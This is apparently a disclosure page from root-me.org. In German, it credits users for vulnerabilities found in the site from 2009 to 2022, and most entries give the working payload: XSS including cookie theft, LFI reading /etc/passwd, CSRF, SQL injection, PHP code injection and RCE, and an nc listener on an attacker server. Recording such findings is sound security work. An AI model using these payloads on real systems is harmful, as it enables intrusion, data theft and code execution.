Hacks
Wie bei jedem Informationssystem wurden auch bei der Website einige Schwachstellen festgestellt.
02/12/2009 real
hat eine Code-Injection-Schwachstelle gefunden:
http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'
02/02/2011 hello
hat mehrere gespeicherte XSS im PM-System gefunden:
<script>[code javascript/vbscript]</script>
15/02/2011 EsSandre
ein LFI gefunden:
http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd
30/06/2011 elyfean
hat einen CSRF in der Chatbox gefunden:
<form id="form" action="http//www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">
</form>
11/07/2011 Armel
hat einen gespeicherten XSS in der Chatbox gefunden.
<iframe src="javascript:[code javascript]' />
18/07/2011 g0uZ
fand eine PHP-Code-Injection-Schwachstelle in den "Online-Tools : nmap"
Host zum Scannen im Modus -sV :
--version-trace -p8888 [IP server attacker]
Dienst, der auf dem Server des Angreifers lauscht
i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done
02/10/2011 Hypnoze
eine unsichere indirekte Objektreferenz gefunden, die zu einem unautorisierten Zugriff auf alle PM führte:
http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_to_read]
23/10/2011 courte66
fand einen reflektierten XSS in der "encode - decode" Seite:
Zu dekodierender Text in base64
Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=
20/03/2012 jimee
ein LFI in einer Herausforderung gefunden:
http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php
06/11/2012 jimee
mehrere gespeicherte XSS in der Benutzerprofilverwaltung gefunden:
<script>[code javascript/vbscript]</script>
15/05/2020 Laluka
mehrere Schwachstellen identifiziert: 3 reflektierte XSS, 2 SQLi und 1 RCE :
https://www.root-me.org/ecrire/?exec=plan&null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=
https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(domain)%20autofocus/%3E
https://www.root-me.org/ecrire/?exec=admin_plugin&var_profile=pouet'/><script>alert(document.domain)</script>
https://www.root-me.org/ecrire/?exec=article_edit&lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--
/ecrire/?exec=accueil&where[]=(SELECT%20SLEEP(5)=1);--+-
https://www.root-me.org/ecrire/?exec=article&id_article=1&ajouter=non&tri_liste_aut=statut&deplacer=oui&_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E
01/10/2021 Podalirius
wurde eine Sicherheitslücke identifiziert, die den Zugriff auf Dokumente, die an Lösungen angehängt sind, ohne Einschränkungen ermöglicht:
<imgXX>
17/03/2022 Mizu
identifizierte eine gespeicherte XSS-Schwachstelle, die mit einem iframe ausgenutzt werden kann, der auf einer bösartigen Domain gehostet wird, die mit www.root-me.org beginnt:
<iframe src="https://www.root-me.org.evil.domain/">